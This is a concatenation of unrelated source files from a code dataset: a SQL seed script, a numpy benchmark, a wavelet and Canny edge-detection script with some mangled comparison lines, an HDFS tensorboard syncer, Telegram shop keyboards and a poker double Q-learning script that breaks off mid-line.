(driver_id, name, email, gender, city, address, phone, firm_id)\n VALUES(101, 'driver2', 'driver2', 'erkek','10', 'address', '123123',100);\n \"\"\",\n\n \"\"\" INSERT INTO drivers \n (driver_id, name, email, gender, city, address, phone, firm_id)\n VALUES(102, 'driver3', 'driver3', 'kadin','10', 'address', '123123',101);\n \"\"\",\n\n \"\"\"INSERT INTO vehicles\n (vehicle_id, name, category, model, capacity, production_year, production_place, description, firm_id)\n VALUES(100, 'rasit', 'ucak', '23423', 100, '1930', 'istabul', 'guzel', 100);\n\"\"\",\n\n \"\"\"INSERT INTO vehicles\n (vehicle_id, name, category, model, capacity, production_year, production_place, description, firm_id)\n VALUES(101, 'Safiye Soyman', 'yuruyen', 'X2342SD', 50, '1920', 'istabul', 'guzel', 102);\n\"\"\",\n\n \"\"\"INSERT INTO users VALUES (\n 100,\n 'admin',\n 'admin@admin.com',\n '81ba6f6fb506d7459c0160c52004f352',\n 'admin',\n 'admin',\n '0321221222',\n '1',\n 'deneme sokak deneme cadde deneme',\n '2017-08-02 12:10:11.123456',\n '2017-08-02 12:10:11.123456',\n 'true'\n \n )\"\"\",\n \"\"\"INSERT INTO users VALUES (\n 101,\n 'user',\n 'user@user.com',\n 'user',\n 'user',\n 'user',\n '0321221222',\n '1',\n 'deneme sokak deneme cadde deneme',\n '2017-08-02 12:10:11.123456',\n '2017-08-02 12:10:11.123456',\n 'false'\n \n )\"\"\"\n\n]\n\n\ndef initialize(url):\n with dbapi2.connect(url) as connection:\n cursor = connection.cursor()\n for statement in INIT_STATEMENTS:\n cursor.execute(statement)\n cursor.close()\n\n\nif __name__ == \"__main__\":\n url = os.getenv(\"DATABASE_URL\")\n if url is None:\n print(\"Usage: DATABASE_URL=url python dbinit.py\", file=sys.stderr)\n sys.exit(1)\n initialize(url)\n","sub_path":"dbinit.py","file_name":"dbinit.py","file_ext":"py","file_size_in_byte":15607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"590265225","text":"\"\"\"\nA series of tests to examing the performance difference between two systems\n\"\"\"\n\ndef sum(lst = [1e3,1e4,1e5,1e6]):\n from time import time\n import timeit\n import numpy as np\n mean = []\n std = []\n size = []\n for length in lst:\n preparation= ''\n preparation += \"import numpy as np \\n\"\n preparation += f\"arr = np.random.rand({int(length)}) \\n\"\n testcode = 'ttttt = arr.sum()'\n t = timeit.Timer(testcode,preparation)\n result = np.array(t.repeat(4,20))/20\n mean.append(round(result.mean(),4))\n std.append(round(result.std(),4))\n size.append(length)\n return np.array(mean), np.array(std), np.array(size)\n","sub_path":"lcp_video/benchmarks/linuxbox_performance.py","file_name":"linuxbox_performance.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"641047292","text":"# -*- coding: utf-8 -*-\nimport numpy as np;\n#from numpy import insert;\nimport cv2;\nimport scipy;\nfrom scipy import misc;\nfrom scipy.misc import imread; \n\n#imag=scipy.misc.imread('F:\\program file\\canopy\\Home_Work\\lena_gray.png',1);\n\nimport numpy as np;\n#from numpy import insert;\nimport cv2;\nimport scipy;\nfrom scipy import misc;\nfrom scipy.misc import imread; \nimport random;\n\nimag_origin=cv2.imread('F:\\program file\\canopy\\Project\\carriage.jpg',0);\n[row,col]=imag_origin.shape;\n#im=np.zeros(shape=(row,col),dtype=np.uint8);\n#noise2=np.zeros(shape=(row,col),dtype=np.uint8);\n#cv2.randn(noise2,(0),(20));\n#print noise2;\nimag=np.zeros(shape=(row,col));\n\n\n############\n##Important Declaration: this salt pepper noise function is from open source library:http://www.scriptscoop.net;\ndef impulse_noise(image,prob):\n\n fina_imag = np.zeros(image.shape,np.uint8)\n thre = 1 - prob \n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n rand = random.random()\n if rand < prob:\n fina_imag[i][j] = 240\n elif rand > thre:\n fina_imag[i][j] = 255\n else:\n fina_imag[i][j] = image[i][j]\n return fina_imag;\n\n##############\n\n\n\nimag = impulse_noise(imag_origin,0.02);\ncv2.imwrite('ca_image_noise2.png', imag);\n\n\n\n[row,col]=imag.shape;\nrow2=int(row*0.5);\ncol2=int(col*0.5);\nrow3=int(row2*0.5);\ncol3=int(col2*0.5);\nrow4=int(row3*0.5);\ncol4=int(col3*0.5);\nrow5=int(row4*0.5);\ncol5=int(col4*0.5);\nrow6=int(row5*0.5);\ncol6=int(col5*0.5);\n\nimag_haar1=np.zeros(shape=(row,col));\nhaar_front1=np.zeros(shape=(row,row));\nhaar_back1=np.zeros(shape=(col,col));\nhaar_front2=np.zeros(shape=(row2,row2));\nhaar_back2=np.zeros(shape=(col2,col2));\nhaar_front3=np.zeros(shape=(row3,row3));\nhaar_back3=np.zeros(shape=(col3,col3));\nhaar_front4=np.zeros(shape=(row4,row4));\nhaar_back4=np.zeros(shape=(col4,col4));\n\ngrad_x1=np.zeros(shape=(row2,col2));\ngrad_y1=np.zeros(shape=(row2,col2));\ngrad_x2=np.zeros(shape=(row3,col3));\ngrad_y2=np.zeros(shape=(row3,col3));\ngrad_x3=np.zeros(shape=(row4,col4));\ngrad_y3=np.zeros(shape=(row4,col4));\n\n\ngrad_x1_rs=np.zeros(shape=(row,col));\ngrad_y1_rs=np.zeros(shape=(row,col));\ngrad_x2_rs=np.zeros(shape=(row2,col2));\ngrad_y2_rs=np.zeros(shape=(row2,col2));\ngrad_x3_rs=np.zeros(shape=(row3,col3));\ngrad_y3_rs=np.zeros(shape=(row3,col3));\n\ndef canny_thre(edge_image,row,col,thre1,thre2):\n \n# for i in range(0,row):\n # for j in range(0,col):\n # if edge_image[i][j]thre2:\n mark[i][j]=1;\n elif edge_image.item((i,j))>thre1:\n mark[i][j]=2;\n elif edge_image.item((i,j))thre2:\n mark[i][j]=1;\n elif edge_image.item((i,j))>thre1:\n mark[i][j]=2;\n elif edge_image.item((i,j))-0.414:\n mark[i+1][j]==2;\n change_sign=1;\n if mark[i-1][j]==1 and tang<0.414 and tang>-0.414:\n mark[i-1][j]==2;\n change_sign=1;\n if mark[i-1][j+1]==1 and tang<-0.414 and tang>-2.414:\n mark[i-1][j+1]==2;\n change_sign=1;\n if mark[i+1][j-1]==1 and tang<-0.414 and tang>-2.414:\n mark[i+1][j-1]==2;\n change_sign=1;\n if (mark[i+1][j]==1 and tang>2.414) or (mark[i+1][j]==1 and tang<-2.414):\n mark[i+1][j]==2;\n change_sign=1;\n if (mark[i-1][j]==1 and tang>2.414) or (mark[i-1][j]==1 and tang<-2.414):\n mark[i-1][j]==2;\n change_sign=1;\n if mark[i-1][j-1]==1 and tang>0.414 and tang<2.414:\n mark[i-1][j-1]==2;\n change_sign=1;\n if mark[i+1][j+1]==1 and tang>0.414 and tang<2.414:\n mark[i+1][j+1]==2;\n change_sign=1;\n \n \n \n new_edge=np.zeros(shape=(row,col)); \n for i in range(0,row):\n for j in range(0,col):\n if mark[i][j]==2:\n new_edge[i][j]=0;\n else:\n new_edge[i][j]=255;\n \n \n return new_edge;\n\n\n\n\ndef canny_thre_grad_test(edge_image,grad_x,grad_y,row,col,thre1,thre2):\n \n# for i in range(0,row):\n # for j in range(0,col):\n # if edge_image[i][j]thre2:\n mark[i][j]=1;\n elif edge_image.item((i,j))>thre1:\n mark[i][j]=2;\n elif edge_image.item((i,j))-0.414:\n mark[i][j+1]==2;\n change_sign=1;\n if mark[i][j-1]==1 and tang<0.414 and tang>-0.414:\n mark[i][j-1]==2;\n change_sign=1;\n if mark[i-1][j+1]==1 and tang<-0.414 and tang>-2.414:\n mark[i-1][j+1]==2;\n change_sign=1;\n if mark[i+1][j-1]==1 and tang<-0.414 and tang>-2.414:\n mark[i+1][j-1]==2;\n change_sign=1;\n if (mark[i+1][j]==1 and tang>2.414) or (mark[i+1][j]==1 and tang<-2.414):\n mark[i+1][j]==2;\n change_sign=1;\n if (mark[i-1][j]==1 and tang>2.414) or (mark[i-1][j]==1 and tang<-2.414):\n mark[i-1][j]==2;\n change_sign=1;\n if mark[i-1][j-1]==1 and tang>0.414 and tang<2.414:\n mark[i-1][j-1]==2;\n change_sign=1;\n if mark[i+1][j+1]==1 and tang>0.414 and tang<2.414:\n mark[i+1][j+1]==2;\n change_sign=1;\n \n \n \n new_edge=np.zeros(shape=(row,col)); \n for i in range(0,row):\n for j in range(0,col):\n if mark[i][j]==2:\n new_edge[i][j]=0;\n else:\n new_edge[i][j]=255;\n \n \n return new_edge;\n\n\n\n\n\n\n\n\n \ndef norm_thre(edge_image,row,col,thre):\n \n new_edge=np.zeros(shape=(row,col));\n for i in range(0,row):\n for j in range(0,col):\n if edge_image.item((i,j))-0.414:\n if Max(edge_imag,i,j,1)!=1:\n result[i][j]=0;\n if tang<-0.414 and tang>-2.414:\n if Max(edge_imag,i,j,2)!=1:\n result[i][j]=0;\n if (tang>2.414) or (tang<-2.414):\n if Max(edge_imag,i,j,3)!=1:\n result[i][j]=0;\n if (tang>0.414) and (tang<2.414):\n if Max(edge_imag,i,j,4)!=1:\n result[i][j]=0;\n \n \n return result;\n\n \ndef Max(edge_imag,i,j,k):\n sign=0;\n if k==1:\n if edge_imag.item((i,j))>edge_imag.item((i+1,j)) and edge_imag.item((i,j))>edge_imag.item((i-1,j)):\n sign=1;\n if k==2:\n if edge_imag.item((i,j))>edge_imag.item((i+1,j+1)) and edge_imag.item((i,j))>edge_imag.item((i-1,j-1)):\n sign=1;\n if k==3:\n if edge_imag.item((i,j))>edge_imag.item((i,j+1)) and edge_imag.item((i,j))>edge_imag.item((i,j-1)):\n sign=1;\n if k==4:\n if edge_imag.item((i,j))>edge_imag.item((i-1,j+1)) and edge_imag.item((i,j))>edge_imag.item((i+1,j-1)):\n sign=1;\n \n return sign;\n\n\n\n\n\n\n\n\n##########################################\n#first scale\n\nfor i in range(0,row):\n for j in range(0,row):\n if i=row2 and j==2*(i-row2): \n haar_front1[i][j]=-0.5;\n elif i>=row2 and j==2*(i-row2)+1:\n haar_front1[i][j]=0.5;\n\n\nfor i in range(0,col):\n for j in range(0,col):\n if i=col2 and j==2*(i-col2): \n haar_back1[i][j]=-0.5;\n elif i>=col2 and j==2*(i-col2)+1:\n haar_back1[i][j]=0.5;\n\nhaar_back1=haar_back1.transpose();\n\nhaar_front1=np.mat(haar_front1);\nhaar_back1=np.mat(haar_back1);\n\nimag_haar1=haar_front1*imag*haar_back1;\n\n\n\n\n\n\nimag_haar_abs1=np.zeros(shape=(row,col));\nfor i in range(0,row):\n for j in range(0,col):\n Num=abs(imag_haar1.item((i,j)));\n imag_haar_abs1[i][j]=Num;\n\n\n\nfor i in range(0,row):\n for j in range(0,col):\n if i>=row2 and j=col2:\n grad_y1[i][j-col2]=imag_haar1.item((i,j));\n\n\n\ngrad_x1_rs=cv2.resize(grad_x1,(row,col));\ngrad_y1_rs=cv2.resize(grad_y1,(row,col));\n\n\n\n\n\n\ncv2.imwrite('ca_haar1.png',imag_haar_abs1);\n\n\n\n#imag_haar_edge1=np.zeros(shape=(row,col));\n#for i in range(0,row):\n # for j in range(0,col):\n # if i=row3 and j==2*(i-row3): \n haar_front2[i][j]=-0.5;\n elif i>=row3 and j==2*(i-row3)+1:\n haar_front2[i][j]=0.5;\n \n\n\nfor i in range(0,col2):\n for j in range(0,col2):\n if i=col3 and j==2*(i-col3): \n haar_back2[i][j]=-0.5;\n elif i>=col3 and j==2*(i-col3)+1:\n haar_back2[i][j]=0.5;\n\n\nhaar_back2=haar_back2.transpose();\n\nhaar_front2=np.mat(haar_front2);\nhaar_back2=np.mat(haar_back2);\n\nimag_haar2=haar_front2*imag2*haar_back2;\nimag_haar_abs2=np.zeros(shape=(row2,col2));\n\nfor i in range(0,row2):\n for j in range(0,col2):\n Num=abs(imag_haar2.item((i,j)));\n imag_haar_abs2[i][j]=Num;\n\ncv2.imwrite('ca_haar2.png',imag_haar_abs2);\n\n\n\nfor i in range(0,row2):\n for j in range(0,col2):\n if i>=row3 and j=col3:\n grad_y2[i][j-col3]=imag_haar2.item((i,j));\n\n\n\n\ngrad_x2_rs=cv2.resize(grad_x2,(row2,col2));\ngrad_y2_rs=cv2.resize(grad_y2,(row2,col2));\n\n\n\n\n\nimag_haar_resize2=np.zeros(shape=(row,col));\nimag_haar_resize2=cv2.resize(imag_haar_abs2,(row,col));\n\n\nimag_haar_mult1=np.zeros(shape=(row,col));\nfor i in range(0,row):\n for j in range(0,col):\n Num=(imag_haar_abs1.item((i,j))*imag_haar_resize2.item((i,j)))**(0.5);\n imag_haar_mult1[i][j]=Num;\n\ncv2.imwrite('ca_haar_mult1.png',imag_haar_mult1);\n\nimag_mult_edge1=np.zeros(shape=(row,col));\nfor i in range(0,row):\n for j in range(0,col):\n if i=row4 and j==2*(i-row4): \n haar_front3[i][j]=-0.5;\n elif i>=row4 and j==2*(i-row4)+1:\n haar_front3[i][j]=0.5;\n \n\nfor i in range(0,col3):\n for j in range(0,col3):\n if i=col4 and j==2*(i-col4): \n haar_back3[i][j]=-0.5;\n elif i>=col4 and j==2*(i-col4)+1:\n haar_back3[i][j]=0.5;\n\n\nhaar_back3=haar_back3.transpose();\n\nhaar_front3=np.mat(haar_front3);\nhaar_back3=np.mat(haar_back3);\n\nimag_haar3=haar_front3*imag3*haar_back3;\nimag_haar_abs3=np.zeros(shape=(row3,col3));\n\nfor i in range(0,row3):\n for j in range(0,col3):\n Num=abs(imag_haar3.item((i,j)));\n imag_haar_abs3[i][j]=Num;\n\n\n\ncv2.imwrite('ca_haar3.png',imag_haar_abs3);\n\n\nfor i in range(0,row3):\n for j in range(0,col3):\n if i>=row4 and j=col4:\n grad_y3[i][j-col4]=imag_haar3.item((i,j));\n\n\ngrad_x3_rs=cv2.resize(grad_x3,(row3,col3));\ngrad_y3_rs=cv2.resize(grad_y3,(row3,col3));\n\n\nimag_haar_resize3=np.zeros(shape=(row2,col2));\nimag_haar_resize3=cv2.resize(imag_haar_abs3,(row2,col2));\n\n\n\nimag_haar_mult2=np.zeros(shape=(row2,col2));\nfor i in range(0,row2):\n for j in range(0,col2):\n Num=(imag_haar_abs2.item((i,j))*imag_haar_resize3.item((i,j)))**(0.5);\n imag_haar_mult2[i][j]=Num;\n\ncv2.imwrite('ca_haar_mult2.png',imag_haar_mult2);\n\n\n\n\nimag_mult_edge2=np.zeros(shape=(row2,col2));\nfor i in range(0,row2):\n for j in range(0,col2):\n if i=row5 and j==2*(i-row5): \n haar_front4[i][j]=-0.5;\n elif i>=row5 and j==2*(i-row5)+1:\n haar_front4[i][j]=0.5;\n \n\n\nfor i in range(0,col4):\n for j in range(0,col4):\n if i=col5 and j==2*(i-col5): \n haar_back4[i][j]=-0.5;\n elif i>=col5 and j==2*(i-col5)+1:\n haar_back4[i][j]=0.5;\n \n \nhaar_back4=haar_back4.transpose(); \n\nhaar_front4=np.mat(haar_front4);\nhaar_back4=np.mat(haar_back4);\n\nimag_haar4=haar_front4*imag4*haar_back4;\nimag_haar_abs4=np.zeros(shape=(row4,col4));\n\nfor i in range(0,row4):\n for j in range(0,col4):\n Num=abs(imag_haar4.item((i,j)));\n imag_haar_abs4[i][j]=Num\n\ncv2.imwrite('ca_haar4.png',imag_haar_abs4);\n\n\n\nimag_haar_resize4=np.zeros(shape=(row3,col3));\nimag_haar_resize4=cv2.resize(imag_haar_abs4,(row3,col3));\n\n\nimag_haar_mult3=np.zeros(shape=(row3,col3));\nfor i in range(0,row3):\n for j in range(0,col3):\n Num=(imag_haar_abs3.item((i,j))*imag_haar_resize4.item((i,j)))**(0.5);\n imag_haar_mult3[i][j]=Num;\n\ncv2.imwrite('ca_haar_mult3.png',imag_haar_mult3);\n\n\n\nimag_mult_edge3=np.zeros(shape=(row3,col3));\nfor i in range(0,row3):\n for j in range(0,col3):\n if i None:\n super().__init__(*args, **kwargs)\n self.hdfs_url = hdfs_url\n self.hdfs_path = hdfs_path\n self.user = user\n\n self.client = InsecureClient(self.hdfs_url, root=self.hdfs_path, user=self.user)\n self.client.makedirs(str(self.sync_path))\n\n @util.preserve_random_state\n def sync(self) -> None:\n for path in self.to_sync():\n file_name = str(self.sync_path.joinpath(path.name))\n\n logging.debug(f\"Uploading {path} to {self.hdfs_path}\")\n\n self.client.upload(file_name, str(path))\n self._synced_event_sizes[path] = path.stat().st_size\n","sub_path":"harness/determined/tensorboard/hdfs.py","file_name":"hdfs.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"524842268","text":"from aiogram import types\nfrom aiogram.types import InlineKeyboardButton, InlineKeyboardMarkup, ReplyKeyboardMarkup, KeyboardButton\n\nimport fastdb\nfrom classes import Position\n\nadmin_inline_main = ['Редактирование позиций', 'Контроль остатков', 'Настройки']\nadmin_inline_redactpos = [\"редактировать\", \"добавить\", \"Удалить\", \"вернуться назад\"]\n\nmenu_reply_main = [['каталог', 'корзина'], ['акции', 'активные заказы']]\n\nzak_stat = [\"обрабатывается\", \"выполняется\", \"завершен\"]\n\n\ndef get_onadd_ikeyb():\n inline_keyb = InlineKeyboardMarkup()\n inline_keyb.add(InlineKeyboardButton(\"продолжить покупки\", callback_data='nextcash'))\n inline_keyb.add(InlineKeyboardButton(\"перейти в корзину\", callback_data='gocard'))\n return inline_keyb\n\ndef get_admin_zakazcontrol_ikeyb():\n inline_keyb = InlineKeyboardMarkup()\n inline_keyb.add(InlineKeyboardButton(\"Следующий статус\", callback_data='nextstat'))\n return inline_keyb\n\n\ndef get_admin_inline_ikeyb():\n inline_keyb = InlineKeyboardMarkup()\n callback_num = 0\n for text_btn in admin_inline_main:\n callback_num += 1\n inline_keyb.add(InlineKeyboardButton(text_btn, callback_data='adminmain' + str(callback_num)))\n return inline_keyb\n\n\ndef get_admin_redactpos_ikeyb():\n inline_keyb = InlineKeyboardMarkup()\n iter = 0\n for text_btn in admin_inline_redactpos:\n iter += 1\n inline_btn = InlineKeyboardButton(text_btn, callback_data='adminredactpos' + str(iter))\n inline_keyb.add(inline_btn)\n return inline_keyb\n\ndef get_admin_redactsettings_ikeyb():\n inline_keyb = InlineKeyboardMarkup()\n inline_keyb.add(InlineKeyboardButton(\"Изменить\", callback_data='adminsred'))\n inline_keyb.add(InlineKeyboardButton(\"Назад\", callback_data='adminsback'))\n return inline_keyb\n\ndef get_admin_sectionpick_rkeyb():\n text_btns = []\n for text_btn in fastdb.ALL_SECTIONS:\n text_btns.append([text_btn])\n print(text_btn)\n return ReplyKeyboardMarkup(text_btns, resize_keyboard=True)\n\n\ndef get_admin_fsectionpick_rkeyb():\n text_btns = []\n for text_btn in fastdb.ALL_FSECTIONS:\n text_btns.append([text_btn])\n print(text_btn)\n return ReplyKeyboardMarkup(text_btns, resize_keyboard=True)\n\n\ndef get_main_menu_rkeyb(isadmin: bool):\n text_btns = menu_reply_main\n print(text_btns)\n if isadmin:\n text_btns.append(['админ панель'])\n return ReplyKeyboardMarkup(text_btns, resize_keyboard=True)\n\n\ndef get_catalog_section_rkeyb():\n inline_kb1 = InlineKeyboardMarkup()\n for sec in fastdb.ALL_SECTIONS:\n inline_kb1.add(InlineKeyboardButton(sec, callback_data=sec))\n return inline_kb1\n\n\ndef get_catalog_fsection_rkeyb(section: str):\n inline_kb1 = InlineKeyboardMarkup()\n for sec in fastdb.get_fsections_from_section(section):\n inline_kb1.add(InlineKeyboardButton(sec, callback_data=sec))\n inline_kb1.add(InlineKeyboardButton(\"Назад\", callback_data='back'))\n return inline_kb1\n\n\n text_btns = []\n text_btns.append([\"назад\"])\n for text_btn in fastdb.get_fsections_from_section(section):\n text_btns.append([text_btn])\n return ReplyKeyboardMarkup(text_btns, resize_keyboard=True)\n\n\ndef get_catalog_interactive_ikeyb(prew: bool, next: bool, isopisopen: bool):\n nextcall = 'next'\n prewcall = 'prew'\n if isopisopen:\n opisbtntext = 'инфо'\n else:\n opisbtntext = 'инфо'\n if prew:\n prewtext = '⬅️'\n else:\n prewcall = 'noprew'\n prewtext = '❌'\n if next:\n nexttext = '➡️'\n else:\n nextcall = 'nonext'\n nexttext = '❌'\n inline_keyb = InlineKeyboardMarkup(row_width=3)\n btnprew = InlineKeyboardButton(prewtext, callback_data=prewcall)\n btnnext = InlineKeyboardButton(nexttext, callback_data=nextcall)\n btnopis = InlineKeyboardButton(opisbtntext, callback_data='showopis')\n btncash = InlineKeyboardButton('добавить в корзину', callback_data='cash')\n inline_keyb.add(btnprew, btnopis, btnnext)\n inline_keyb.add(btncash)\n inline_keyb.add(InlineKeyboardButton(\"Назад\", callback_data='back'))\n return inline_keyb\n\n\ndef get_addtocard_ikeyb():\n inline_keyb = InlineKeyboardMarkup(row_width=3)\n btnsmall = InlineKeyboardButton('меньше', callback_data='small')\n btnbig = InlineKeyboardButton('больше', callback_data='big')\n btnok = InlineKeyboardButton('добавить', callback_data='ok')\n inline_keyb.add(btnsmall, btnok, btnbig)\n return inline_keyb\n\n\ndef get_card_ikeyb():\n inline_keyb = InlineKeyboardMarkup(row_width=1)\n btnsmall = InlineKeyboardButton('оформить заказ', callback_data='add')\n btnbig = InlineKeyboardButton('очистить корзину', callback_data='clear')\n inline_keyb.add(btnsmall)\n inline_keyb.add(btnbig)\n return inline_keyb\n\n\ndef get_dostavka_ikeyb():\n inline_keyb = InlineKeyboardMarkup(row_width=1)\n btnsmall = InlineKeyboardButton(f'курьером (+{str(fastdb.DOSTAVKA_COST)}р.)', callback_data='kura')\n btnbig = InlineKeyboardButton('самовывоз (пушкинаколотушкина дом 77)', callback_data='samov')\n inline_keyb.add(btnsmall)\n inline_keyb.add(btnbig)\n return inline_keyb\n\n\n","sub_path":"ui/keyboards.py","file_name":"keyboards.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"325835785","text":"# g=[[],[],[],[]]\n# #a[1][2][3][4]=1\n# for i in range(4):\n# \tfor j in range(4):\n# \t\tfor a in range(4):\n# \t\t\tfor b in range(4):\n# \t\t\t\ta[i][j][a][b] = \n# print (g)\nimport random\nimport numpy as np\nfrom result import *\nfrom Judge import *\nfrom GradetheCard import *\nimport time\nfrom GenAct import *\nfrom GradeAgent import *\nstart = time.clock()\n\n\n#w, h, radius = 5, 10, 10\n# for action11 in range(4):\n# \tstateaction11 = {}\n# \tfor action12 in range(4):\n# \t\tstateaction12 = {}\n# \t\tfor action21 in range(4):\n# \t\t\tstateaction21 = {}\n# \t\t\tfor action22 in range(4):\n# \t\t\t\tstateaction22 = {}\n# \t\t\t\tfor action31 in range(4):\n# \t\t\t\t\tstateaction31 = {}\n# \t\t\t\t\tfor action32 in range(4):\n# \t\t\t\t\t\tstateaction32 = {}\n# \t\t\t\t\t\tfor action41 in range(4):\n# \t\t\t\t\t\t\tstateaction41 = {}\n# \t\t\t\t\t\t\tfor action42 in range(4):\n# \t\t\t\t\t\t\t\tstateaction42 = {}\n# \t\t\t\t\t\t\t\tfor action51 in range(4):\n# \t\t\t\t\t\t\t\t\tstateaction51 = {}\n# \t\t\t\t\t\t\t\t\tfor action52 in range(4):\n# \t\t\t\t\t\t\t\t\t\tstateaction52 = {}\n# \t\t\t\t\t\t\t\t\t\tfor level in range(6):\n# \t\t\t\t\t\t\t\t\t\t\tlevelrank = {}\n# \t\t\t\t\t\t\t\t\t\t\tfor rank in range(52*52*52):\n# \t\t\t\t\t\t\t\t\t\t\t\tlevelrank[rank] = i\n# \t\t\t\t\t\t\t\t\t\t\t\ti = i + 1\n# \t\t\t\t\t\t\t\t\t\t\tstateaction52[level] = levelrank\n# \t\t\t\t\t\t\t\t\t\tstateaction51[action52] = stateaction52\n# \t\t\t\t\t\t\t\t\tstateaction42[action51] = stateaction51\n# \t\t\t\t\t\t\t\tstateaction41[action42] = stateaction42\n# \t\t\t\t\t\t\tstateaction32[action41] = stateaction41\n# \t\t\t\t\t\tstateaction31[action32] = stateaction32\n# \t\t\t\t\tstateaction22[action31] = stateaction31\n# \t\t\t\tstateaction21[action22] = stateaction22\n# \t\t\tstateaction12[action21] = stateaction21\n# \t\tstateaction11[action12] = stateaction12\n# \tstateaction[action11] = stateaction11\ni = 1\nstate2 = {}\n#for pot in range(10, 10230, 10):\n##########################\n#state\nfor pot in range(10, 640, 10):\n\n\tpotlist = {}\n\t#for R in range(0, 5):\n\tfor R in range(0, 3):\n\t\troundlist = {}\n\t\t#for delta in [10, 20, 40, 80, 160, 320, 640, 1280, 2560, 5120]:\n\t\tfor delta in [10, 20, 40, 80, 160, 320]:\n\t\t\tdeltalist = {}\n\t\t\tfor level in range(1, 7):\n\t\t\t\tlevellist = {}\n\t\t\t\tfor rank in range(1, 2400):\n\t\t\t\t\tlevellist[rank] = i\n\t\t\t\t\ti = i + 1\n\t\t\t\tdeltalist[level] = levellist\n\t\t\troundlist[delta] = deltalist\n\t\tpotlist[R] = roundlist\n\tstate2[pot] = potlist\n\nelapsed = (time.clock() - start)\nprint(\"Time used:\",elapsed)\n\n# for a in range(5):\n\n# \tfor b in range(10):\n# \t\tfor c in range(10):\n# \t\t\though[a][b][c]=1\n# print (stateaction)\n\n# position = np.argmax(stateaction)\n# print (position)\ndef DQLearning(num_episodes, e, gamma, lr, Q1, Q2, GenerateAction1):\n\t\n\tfor epi in range(0, num_episodes):\n\t\t\n\t\ti = 0\n\t\tdone = False\n\t\treward = 0\n\t\taction1 = {}\n\t\taction2 = {}\n\t\tGrade1, Grade2, player1, player2 = Grade()\n\t\t[level1, rank1] = Grade1\n\t\t# if level1 > 1:\n\t\t# \taction111 = (1, 1, 1, 1, 1)\n\t\t# if level1 == 1:\n\t\t# \taction111 = (1, 0, 0)\n\t\t[level, rank] = GradetheAgent()\n\t\twinnerp = judge(Grade1, Grade2)\n\t\taction = (0, 1, 2, 3)\n\t\t#####################\n\t\t#taolu\n\t\tif GenerateAction1 == 1:\n\t\t\taction111 = genact1(level1, rank1)\n\t\tif GenerateAction1 == 2:\n\t\t\taction111 = genact2(level1, rank1)\n\t\tif GenerateAction1 == 3:\n\t\t\taction111 = genact3(level1, rank1)\n\n\t\n\t\t#action1[0] = random.choice(action)\n\t\taction1[0] = action111[0]\n\t\tpot = 30\n\t\tR = 0\n\t\tdelta = 10\n\n\t\tif action1[0] == 0 or action1[0] == 3:\n\t\t\tdone = True\n\t\t\taction2[0] = 0\n\t\t\t#reward = result(action1, action2, winnerp)\n\t\tif action1[0] == 1:\n\t\t\tpot = 10\n\t\t\tdelta = 10\n\t\tif action1[0] == 2:\n\t\t\tpot = 20\n\t\t\tdelta = 20\n\t\tstate = state2[pot][R][delta][level][rank]\n\n\n\n\t\twhile not done:\n\t\t\tif action1[i] == 0 or action1[i] == 3:\n\t\t\t\treward = result(action1, action2, winnerp)\n\t\t\t\tQ1[state][0] = Q1[state][0] + lr*reward\n\t\t\t\tQ1[state][1] = Q1[state][1] + lr*reward\n\t\t\t\tQ1[state][2] = Q1[state][2] + lr*reward\n\t\t\t\tQ1[state][3] = Q1[state][3] + lr*reward\n\t\t\t\tQ2[state][0] = Q2[state][0] + lr*reward\n\t\t\t\tQ2[state][1] = Q2[state][1] + lr*reward\n\t\t\t\tQ2[state][2] = Q2[state][2] + lr*reward\n\t\t\t\tQ2[state][3] = Q2[state][3] + lr*reward\n\t\t\t\tbreak\n\t\t\tif action1[i] == 1 or action1[i] == 2:\n\t\t\t\ta = random.random()\n\t\t\t\tif a < 1-4/3*e:\n\t\t\t\t\taction2[i] = np.argmax(Q1[state] + Q2[state])\n\t\t\t\telse:\n\t\t\t\t\taction2[i] = random.choice(action)\n\n\t\t\t\t#action1[i+1] = random.choice(action)\n\t\t\t\taction1[i+1] = action111[i+1]\n\n\t\t\t\tQA1 = np.zeros(4)\n\t\t\t\tQA2 = np.zeros(4)\n\n\t\t\t\t#if (action2[i] == 0 or action2[i] == 3) or R == 4:\n\t\t\t\tif (action2[i] == 0 or action2[i] == 3) or R == 2:\n\t\t\t\t\treward = result(action1, action2, winnerp)\n\t\t\t\t\tQ1[state][action2[i]] = Q1[state][action2[i]] + lr*reward\n\t\t\t\t\tQ2[state][action2[i]] = Q2[state][action2[i]] + lr*reward\n\t\t\t\t\tbreak\n\n\t\t\t\tif action2[i] == 1:\n\t\t\t\t\tif action1[i+1] == 1:\n\t\t\t\t\t\tpot = pot + 2*delta\n\t\t\t\t\tif action1[i+1] == 2:\n\t\t\t\t\t\tpot = pot + 3*delta\n\t\t\t\t\t\tdelta = 2*delta\n\t\t\t\tif action2[i] == 2:\n\t\t\t\t\tif action1[i+1] == 1:\n\t\t\t\t\t\tpot = pot + 4*delta\n\t\t\t\t\t\tdelta = 2*delta\n\t\t\t\t\tif action1[i+1] == 2:\n\t\t\t\t\t\tpot = pot + 6*delta\n\t\t\t\t\t\tdelta = 4*delta\n\n\t\t\tstatep = state2[pot][R][delta][level][rank]\n\t\t\tfor actionp in range(0, 4):\n\t\t\t\tQA1[actionp] = Q1[statep][actionp]\n\t\t\t\tQA2[actionp] = Q2[statep][actionp]\n\t\t\tRanRate = random.random()\n\t\t\tif RanRate < 0.5:\n\t\t\t\tQ1[state][action2[i]] = Q1[state][action2[i]] + lr*(reward + gamma * max(QA2) - Q1[state][action2[i]])\n\t\t\tif RanRate > 0.5:\n\t\t\t\tQ2[state][action2[i]] = Q2[state][action2[i]] + lr*(reward + gamma * max(QA1) - Q2[state][action2[i]])\n\t\t\tstate = statep\n\t\t\tR = R + 1\n\t\t\ti = i + 1\n\n\t\t# if epi > 999900:\n\t\t# \tprint(action2)\n\treturn Q1, Q2\n\n\t\t\n\t#print(action1)\n\t\n\n\n\n\n\n\t\t\n\n\nQ1 = np.zeros((1360000000, 4))\nQ2 = np.zeros((1360000000, 4))\nQ1, Q2 = 